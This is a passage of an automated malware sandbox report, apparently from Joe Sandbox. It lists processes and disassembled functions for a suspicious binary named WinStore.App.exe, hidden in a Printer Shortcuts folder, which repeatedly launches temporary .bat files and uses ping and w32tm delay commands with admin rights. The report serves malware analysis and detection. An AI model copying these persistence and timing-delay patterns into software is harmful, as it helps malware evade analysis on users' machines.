Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	04:23:22
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	04:23:22
Start date:	26/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff73d800000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	04:23:22
Start date:	26/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7fd080000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	04:23:31
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\PrintHood\WinStore.App.exe"
Imagebase:	0xb70000
File size:	1'914'880 bytes
MD5 hash:	67247063BFBF3EEDFDFD183E8235A5E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	04:23:35
Start date:	26/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0T9X0LKmT6.bat"
Imagebase:	0x7ff61cbe0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	04:23:35
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	04:23:35
Start date:	26/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff73d800000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	04:23:35
Start date:	26/12/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7ffdc0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	04:23:40
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\PrintHood\WinStore.App.exe"
Imagebase:	0x1d0000
File size:	1'914'880 bytes
MD5 hash:	67247063BFBF3EEDFDFD183E8235A5E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	04:23:43
Start date:	26/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ge8uHQboyx.bat"
Imagebase:	0x7ff61cbe0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	04:23:43
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	04:23:43
Start date:	26/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff73d800000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	04:23:43
Start date:	26/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7fd080000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	04:23:52
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\PrintHood\WinStore.App.exe"
Imagebase:	0xab0000
File size:	1'914'880 bytes
MD5 hash:	67247063BFBF3EEDFDFD183E8235A5E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	04:23:55
Start date:	26/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OTvWQnNRQU.bat"
Imagebase:	0x7ff61cbe0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	04:23:55
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	04:23:55
Start date:	26/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff73d800000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	04:23:56
Start date:	26/12/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7ffdc0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	04:24:01
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\PrintHood\WinStore.App.exe"
Imagebase:	0xea0000
File size:	1'914'880 bytes
MD5 hash:	67247063BFBF3EEDFDFD183E8235A5E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	7.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF847150D48 Relevance: 1.5, Strings: 1, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5[_H, xrefs: 00007FF847150DF3

Memory Dump Source

Source File: 00000000.00000002.2077198720.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847150000_67VB5TS184.jbxd

Similarity

API ID:
String ID: 5[_H
API String ID: 0-3279724263
Opcode ID: 3ce42f90cc01dfb5e37ad0b5aac74fc5b27e8c21dc981a9014304e81e5121986
Instruction ID: b13e4ffe1aab091a4a8e467ab69296bc33798c6d3c60a01f9cdec24030041cf1
Opcode Fuzzy Hash: 3ce42f90cc01dfb5e37ad0b5aac74fc5b27e8c21dc981a9014304e81e5121986
Instruction Fuzzy Hash: 0E91E17591DA899FE789EF6888693A97FF1FF96784F5000BAC009D72D6CB781811CB01

Function 00007FF84754A1B1 Relevance: 1.8, APIs: 1, Instructions: 255
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryFullProcessImageNameA.KERNELBASE ref: 00007FF84754A361

Memory Dump Source

Source File: 00000000.00000002.2079626674.00007FF847540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847540000_67VB5TS184.jbxd

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: 7e5f33e41ef87339f46e5c6e0db4e27c5f920ba65ed203e18d2832a714423b9d
Instruction ID: bbbd5dee7dba9656931c265270216a56a1446df134bdbb0103f59d44e438445a
Opcode Fuzzy Hash: 7e5f33e41ef87339f46e5c6e0db4e27c5f920ba65ed203e18d2832a714423b9d
Instruction Fuzzy Hash: CA818F30508A8C8FDBA9EF28C8597F937E1FB59311F10427EE84EC7292CB7598458B81

Function 00007FF8471508D0 Relevance: 1.4, Strings: 1, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

87 G, xrefs: 00007FF84715AA55

Memory Dump Source

Source File: 00000000.00000002.2077198720.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847150000_67VB5TS184.jbxd

Similarity

API ID:
String ID: 87 G
API String ID: 0-1220742358
Opcode ID: 9569e35a74e2d7f197c5a33c59843bc23a1ef0ec439e2d117a14f545a6085f8b
Instruction ID: f8bdaafb0247f756dc40fcf2eed7f8e3e00b831ab6c7c3577064acb0125c8f51
Opcode Fuzzy Hash: 9569e35a74e2d7f197c5a33c59843bc23a1ef0ec439e2d117a14f545a6085f8b
Instruction Fuzzy Hash: 2D417B12A0D9955FE304BB7CA09A2FDB780DF857A5B0500BFD04ECB1D7DE18A88186C5

Function 00007FF847150998 Relevance: 1.3, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

87 G, xrefs: 00007FF84715AA55

Memory Dump Source

Source File: 00000000.00000002.2077198720.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847150000_67VB5TS184.jbxd

Similarity

API ID:
String ID: 87 G
API String ID: 0-1220742358
Opcode ID: 79ad405898300f017ba3275d035032cb7c534657cc357e6f4706819d6e7f07ba
Instruction ID: 7c8439254601b816b57e96cb2ce2eca34bad0ee0fcab7a1dd9e05cc2ea94976c
Opcode Fuzzy Hash: 79ad405898300f017ba3275d035032cb7c534657cc357e6f4706819d6e7f07ba
Instruction Fuzzy Hash: 56216820B2D9995FE788F72C844A67AB7C2EB99754B4000BDE44EC32D3DD28AC818781

Function 00007FF847150C25 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2077198720.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847150000_67VB5TS184.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bec9548f166109eb60e39f7f2b2e8168602ddde85aa21c1380f46fbc7bbfa53c
Instruction ID: 14609162687a2b9ccc60b4a7adca88ea05cf1c463e0e467d586f2bb36d6ae53c
Opcode Fuzzy Hash: bec9548f166109eb60e39f7f2b2e8168602ddde85aa21c1380f46fbc7bbfa53c
Instruction Fuzzy Hash: 7A31F936D1C6C5DEE315BFB894462ECBBA0EF423A0F1549F6C0088A1C3DA38258A8F41

Function 00007FF84715116D Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2077198720.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847150000_67VB5TS184.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37d94d3a71d63e21ab1997a17b83ca9d49d049ae71876c9cc1bf28d152fe7a6e
Instruction ID: 0e395705ae41a8ae9cec9ad49e38d0b34f33798b7cc2971676615c02207202a0
Opcode Fuzzy Hash: 37d94d3a71d63e21ab1997a17b83ca9d49d049ae71876c9cc1bf28d152fe7a6e
Instruction Fuzzy Hash: 1731413190D58A8FDB4AFB78C899ABDBBF0FF55350B0445BAC009D71A2DA28A941CB50

Function 00007FF847153061 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2077198720.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847150000_67VB5TS184.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07f691350b4f2b61f0dcdf7b904dc8d354c808fdf53c4a93624ea88c59af3907
Instruction ID: 87edde50110d273a3c213c635986d747f63058d3be186d089b6e55cec1b87db0
Opcode Fuzzy Hash: 07f691350b4f2b61f0dcdf7b904dc8d354c808fdf53c4a93624ea88c59af3907
Instruction Fuzzy Hash: 6B210C3090C959CFEB58EB24C494BADB7E1EB58355F604179D40ED3291CE3969818F41

Function 00007FF847150C38 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2077198720.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847150000_67VB5TS184.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 020cba8e53ba63f506abe7e3cfdc51a07586cca66c8185d88af32c83a96c9dcc
Instruction ID: 8af0bf497d13f211e24452d1f4c407724efad7740347289f427dbe051c62afb5
Opcode Fuzzy Hash: 020cba8e53ba63f506abe7e3cfdc51a07586cca66c8185d88af32c83a96c9dcc
Instruction Fuzzy Hash: 9C11A335E1C6C9CFE706EFB898411ECBBB0EF42390F0549F6C044DB192D534594A8B90

Function 00007FF847150C48 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2077198720.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847150000_67VB5TS184.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74662f3bdf5643d8504d6a93f0a823d4453bfb506fcc710fca73e06ea767d39b
Instruction ID: d949f9a595125d8de664a5e63e80b5f7ee22021e8c66aa36a97b08cf44dea53a
Opcode Fuzzy Hash: 74662f3bdf5643d8504d6a93f0a823d4453bfb506fcc710fca73e06ea767d39b
Instruction Fuzzy Hash: 56018071D0D3C9DFD706EFB8884119CBFB0EF42350F1549E6C044DB192D5346A858B41

Function 00007FF847150C50 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2077198720.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847150000_67VB5TS184.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3854ea99020eec431d5bb3daf4c0423dd0592b085c10470ff2a3797439416bd6
Instruction ID: 4d2d552cd0decbeac8df0b032be8286814849e6b10002238857710959cd955d4
Opcode Fuzzy Hash: 3854ea99020eec431d5bb3daf4c0423dd0592b085c10470ff2a3797439416bd6
Instruction Fuzzy Hash: 0B017C71D0D3C9DFE70AEFB888851ACBFB0EF02390F1549E6C044CB196DA386A858B41

Function 00007FF847150CF6 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2077198720.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847150000_67VB5TS184.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad1a60ba3e4a75c1a013f0c9591e9dba07c19292a5b5f3f491d7912bee3a7d3b
Instruction ID: 0215727cb234cbd34f797f36a69488c4b030a194a922d451d5e0d22d695e3dc8
Opcode Fuzzy Hash: ad1a60ba3e4a75c1a013f0c9591e9dba07c19292a5b5f3f491d7912bee3a7d3b
Instruction Fuzzy Hash: 74F03A74A1C68ADEE758EFA884446BDB6E0EF55391F1449BAD009C22C5DA78A580CE40

Function 00007FF847152059 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2077198720.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847150000_67VB5TS184.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16aa5848e8b16e7a4923041183e2fb764416e1f7440d9d5848bf56511e8c2e64
Instruction ID: 31ade27f314894b9308694b9dd2de0e9c14a7d014d57d6604bdc86933837f841
Opcode Fuzzy Hash: 16aa5848e8b16e7a4923041183e2fb764416e1f7440d9d5848bf56511e8c2e64
Instruction Fuzzy Hash: DFE01A24E0C4568EF758B694D8913EEA2A1EB88380F140978D90E973C5CE68AE04CA05

Function 00007FF84715659F Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2077198720.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847150000_67VB5TS184.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2db9bbfd29bdef43c3558ba68a5411e6ee3b7cb751969dced8c7736fcc1d1ea5
Instruction ID: 33b7b8269eed6267700a4b2e51ef894d1d6e5739321394df2b0d711865804afe
Opcode Fuzzy Hash: 2db9bbfd29bdef43c3558ba68a5411e6ee3b7cb751969dced8c7736fcc1d1ea5
Instruction Fuzzy Hash: 0FE01211F2C6868FF79CB5B814263BCD0D1AF88795F484279D00ED32C7DC481C804A93

Function 00007FF847150B9D Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2077198720.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847150000_67VB5TS184.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e757316dbc60ef404f881530e4a45e0a8044c33ddaec1649c9cf004b9411ba8b
Instruction ID: df8ac14e072b8b60f0154ce09035fc04aea74fa69abd271c5a8bb75408722a93
Opcode Fuzzy Hash: e757316dbc60ef404f881530e4a45e0a8044c33ddaec1649c9cf004b9411ba8b
Instruction Fuzzy Hash: DFC0123062884E8FDA84BB28C888828BBA0FB0E301FD910E4E00CC71A1D659A8908B40

Function 00007FF8471506A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2077198720.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847150000_67VB5TS184.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39e75ce6de41251b7245575d1327e4a39e3ca77f8d05d269fbb27d30311325e7
Instruction ID: 7efc6e6a107773a710754f41b277e86e2ce5a7f714c54ede8fa215bff81e96a2
Opcode Fuzzy Hash: 39e75ce6de41251b7245575d1327e4a39e3ca77f8d05d269fbb27d30311325e7
Instruction Fuzzy Hash: 2BC08C00E0E4CBC9F41C39BE64020BDE1006FC4390FD00A32C40C800C1EC0E20C50956

Function 00007FF8471512D8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2077198720.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847150000_67VB5TS184.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 592336207b0fd429919af12de50390d5ea831fc2a45581b9b788df7b3f0c4ac1
Instruction ID: 3e4c6e2701bf6240df32065ed3c27f67c7d15974391e18ec28cb44a3420a3617
Opcode Fuzzy Hash: 592336207b0fd429919af12de50390d5ea831fc2a45581b9b788df7b3f0c4ac1
Instruction Fuzzy Hash: A0C04C345558498FC958FB69C8899187BA0FB59315BD500A0E409C7171D669ECD5CB41

Function 00007FF84715251B Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2077198720.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847150000_67VB5TS184.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3c1717dcc200454fd7e0f097b0784f43782ab4a57531eb5cce556ecd497a423
Instruction ID: 7d84b1f9164b6c238c8925c91e8db22cf9426f6f90816f8d246ff95dc89886a7
Opcode Fuzzy Hash: a3c1717dcc200454fd7e0f097b0784f43782ab4a57531eb5cce556ecd497a423
Instruction Fuzzy Hash: CBC08C00F1D81A1AF145B204040137E00828F80B88F441130E00ECA3CACD0D1D0116C2

Function 00007FF8471506C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2077198720.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847150000_67VB5TS184.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a46d805e7806aa06fb27ab36205b3a8568fbf8b812599b035d4541ab75922a43
Instruction ID: aa7bf06a2d373fa0f5ab5239ef6dda7cb799cfcac816b2e80f8dab0c7ac27647
Opcode Fuzzy Hash: a46d805e7806aa06fb27ab36205b3a8568fbf8b812599b035d4541ab75922a43
Instruction Fuzzy Hash: 40B00204C5E4CF85E45C35BA19464BDF4505F45354FD51570D40D90185E84E25955657

Non-executed Functions

Function 00007FF847547FF8 Relevance: 1.8, Strings: 1, Instructions: 570COMMON

Download Yara Rule

Strings

%G, xrefs: 00007FF8475481EB

Memory Dump Source

Source File: 00000000.00000002.2079626674.00007FF847540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847540000_67VB5TS184.jbxd

Similarity

API ID:
String ID: %G
API String ID: 0-2486617024
Opcode ID: 0ec27d365b059deecb537fb005ba76216c5e2f67f5835a1f5dec8235b4bca878
Instruction ID: 07e8a06953951e9db5ac5580e814297b6f904426a264019c1e12385442fec9c7
Opcode Fuzzy Hash: 0ec27d365b059deecb537fb005ba76216c5e2f67f5835a1f5dec8235b4bca878
Instruction Fuzzy Hash: 1D028E30E1C95A9FEA98FB6898953BC77E1FF98794F15007AD41DC7286CE2878818B41

Function 00007FF847150E43 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2077198720.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847150000_67VB5TS184.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce8f339440a772310f6988c7f82fc97f26157287a40eb5e107752488729eb0f9
Instruction ID: 6551b145c40e8fe669abb0f1a8438d2d932aa57a02c49f68df912c9fae78757a
Opcode Fuzzy Hash: ce8f339440a772310f6988c7f82fc97f26157287a40eb5e107752488729eb0f9
Instruction Fuzzy Hash: A451E175A28A898EE388EF68D4593A9BBE0FB86798F50017EC009D77D5CBB81451CB00

Function 00007FF8471509B0 Relevance: 5.2, Strings: 4, Instructions: 197COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FF847150B3E
c9, xrefs: 00007FF847150B56
"s9, xrefs: 00007FF847150B46
!k9, xrefs: 00007FF847150B4E

Memory Dump Source

Source File: 00000000.00000002.2077198720.00007FF847150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff847150000_67VB5TS184.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 3e66a2881e3b9b8727a72305aa08277b40f18a718f3831b2ddf943178dfa05e7
Instruction ID: 2d2163102e6b0a346d68bc43c3abf8f457d7aff21e050b67d866e512a81c6746
Opcode Fuzzy Hash: 3e66a2881e3b9b8727a72305aa08277b40f18a718f3831b2ddf943178dfa05e7
Instruction Fuzzy Hash: C151C20BA1E46369E2113BFD710B1EC5B84DFC5BF9B095677E14EC90C78E08648A8AE5

Analysis Process: WinStore.App.exePID: 2556, Parent PID: 5160COMMON

Executed Functions

Function 00007FF84932E5A4 Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

;_H, xrefs: 00007FF84932E970

Memory Dump Source

Source File: 00000006.00000002.2171968137.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff849320000_WinStore.jbxd

Similarity

API ID:
String ID: ;_H
API String ID: 0-1267907542
Opcode ID: bf2267700fa23661fa917130f56c5b11a2b46b80211cf468dedf16eac8b67c68
Instruction ID: 7d2f0d67547512ffcdfa43e036f5ec2e547ca90c28663a9c7fe38b3687e2c496
Opcode Fuzzy Hash: bf2267700fa23661fa917130f56c5b11a2b46b80211cf468dedf16eac8b67c68
Instruction Fuzzy Hash: 3ED18331E1C9594FE7A8FB2C945B6B973D2EF99790F4411BAD40ED32C2DE286C428781

Function 00007FF848F30D48 Relevance: 1.5, Strings: 1, Instructions: 251COMMON

Download Yara Rule

Strings

5Y_H, xrefs: 00007FF848F30DF3

Memory Dump Source

Source File: 00000006.00000002.2169316126.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID: 5Y_H
API String ID: 0-3237497481
Opcode ID: 61b48b2c9afed671ca60aa7d2b0754d37ecb7634e63d991f2311093b853c5cfb
Instruction ID: 40934cb9a0d40014991ab1f18e21f44cd28743a9020a00df861a4276b63f2994
Opcode Fuzzy Hash: 61b48b2c9afed671ca60aa7d2b0754d37ecb7634e63d991f2311093b853c5cfb
Instruction Fuzzy Hash: 0D91A0B1A1EA8D9FE789EB2888653A97FE1FB95341F8001BBC049D72D2CF791411C715

Function 00007FF848F30E43 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2169316126.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 229b8c79eca4072eac4cd7f005520044f320ed17e1aa38af7dda2aa5a47adec5
Instruction ID: 2f374a7a7cc03fe64dddc49682c43468db12d4f422cf03db747755602b89d881
Opcode Fuzzy Hash: 229b8c79eca4072eac4cd7f005520044f320ed17e1aa38af7dda2aa5a47adec5
Instruction Fuzzy Hash: BE519EB1A1EA4D9EE388EB18D8693AD7FE1FB85351F9002BBC00AD77D1CB7914118700

Function 00007FF849323D52 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

, xrefs: 00007FF849323DC2

Memory Dump Source

Source File: 00000006.00000002.2171968137.00007FF849320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849320000, based on PE: false

Joe Sandbox IDA Plugin

